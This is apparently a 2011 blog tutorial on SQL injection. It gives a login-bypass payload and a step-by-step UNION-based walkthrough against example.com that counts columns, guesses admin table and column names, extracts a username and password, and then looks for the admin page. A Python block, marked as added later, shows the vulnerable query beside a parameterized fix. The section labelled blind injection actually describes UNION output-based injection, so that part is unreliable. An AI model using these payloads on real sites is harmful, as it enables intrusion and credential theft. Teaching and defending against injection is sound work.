Monday, June 20, 2011

Standard SQL Injection and Blind SQL Injection



An SQL injection attack consists of inserting, or "injecting", SQL syntax into the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), read the content of a given file on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to change the execution of the predefined SQL commands.

Standard SQL Injection
Consider the following SQL query:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A query like this is commonly used by a web application to authenticate a user. If the query returns a row, a user with those credentials exists in the database and the user is allowed to log in; otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable web site is www.example.com, the request that we'll carry out will be:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

After a short analysis we notice that the query returns a row (or a set of rows) because the WHERE clause is always true: AND binds tighter than OR, so the trailing OR '1' = '1' is enough to satisfy the whole condition. In this way the system has authenticated the user without knowing the username and password.
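The root cause is that the login query is built by pasting the submitted values into the SQL text. The following added example (not part of the original post) reproduces the query above against a constructed in-memory SQLite table, once with string concatenation and once with bound parameters, and feeds both the exact payload shown above; the table contents and the sqlite3 backend are assumptions for the demonstration.

```python
import sqlite3

# Constructed stand-in for the post's Users table (sample data, not real credentials).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 'sample-password')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Mirrors the post's query: the submitted values become part of the SQL text,
    # so quotes and operators in the input are parsed as SQL.
    sql = (f"SELECT * FROM Users WHERE Username='{username}' "
           f"AND Password='{password}'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Same query, but the values travel as bound parameters. The database
    # receives them as data, never as SQL syntax, so the quote is just a quote.
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

PAYLOAD = "1' or '1' = '1"   # the exact input shown in the post

def demo():
    """Run both versions with real credentials and with the injection payload."""
    conn = make_db()
    return {
        "vuln_real": login_vulnerable(conn, "admin", "sample-password"),
        "vuln_payload": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "safe_real": login_safe(conn, "admin", "sample-password"),
        "safe_payload": login_safe(conn, PAYLOAD, PAYLOAD),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'authenticated' if ok else 'denied'}")
```

Only the concatenated version accepts the payload; the parameterized version authenticates the real user and denies the payload, because the whole string is compared literally against the Username column.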

Blind SQL Injection
We have pointed out that there is another category of SQL injection, called Blind SQL Injection, in which nothing is known about the outcome of an operation. For example, this happens when the programmer has created a custom error page that reveals nothing about the structure of the query or the database. (The page does not return a SQL error; it may just return an HTTP 500.)

By using inference methods it is possible to get around this obstacle and recover the values of the desired fields. The method consists of sending a series of boolean queries to the server, observing the answers and deducing their meaning. We consider, as always, the www.example.com domain and we suppose that it contains a parameter named id that is vulnerable to SQL injection. This means that sending either of the following requests:

http://www.example.com/index.php?id=1'
http://www.example.com/index.php?id=-1

(or anything else) returns a page with the custom error message, caused by a syntax error in the query.

First find the number of columns the query returns, using ORDER BY:
http://www.example.com/index.php?id=-1+order+by+1--

Increase the number step by step:
http://www.example.com/index.php?id=-1+order+by+1--
http://www.example.com/index.php?id=-1+order+by+2--
http://www.example.com/index.php?id=-1+order+by+3--
http://www.example.com/index.php?id=-1+order+by+4--

until an error message appears or the page content goes missing:
http://www.example.com/index.php?id=-1+order+by+5--

so the count is the last number that worked, here 4:
http://www.example.com/index.php?id=-1+order+by+4--

To see which of the column positions is displayed on the page, use UNION SELECT with that many columns (the error appeared at 5, so four): http://www.example.com/index.php?id=-1+union+select+1,2,3,4--

Find The Table

Guess likely table names, for example admin, admins, login, logins, user, users, by appending +from+(table_name)--

http://www.example.com/index.php?id=-1+union+select+1,2,3,4+from+admin--
If there is no error, one of the numbers is displayed on the page, for example 2.

Find The Username and Password Column

For the username column, guess likely names again, for example:
user, usr, username, user_name, login, user_admin, name, admin_user, etc.

Remember that 2 was the number displayed, so we replace it with the column name:

http://www.example.com/index.php?id=-1+union+select+1,username,3,4+from+admin--
Example output: admin
So admin is the username.

For the password column, guess likely names again, for example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, etc.

http://www.example.com/index.php?id=-1+union+select+1,password,3,4+from+admin--
Example output: 123456
So 123456 is the password.

Finally, the last step is to find the admin page:
ex: example.com/admin
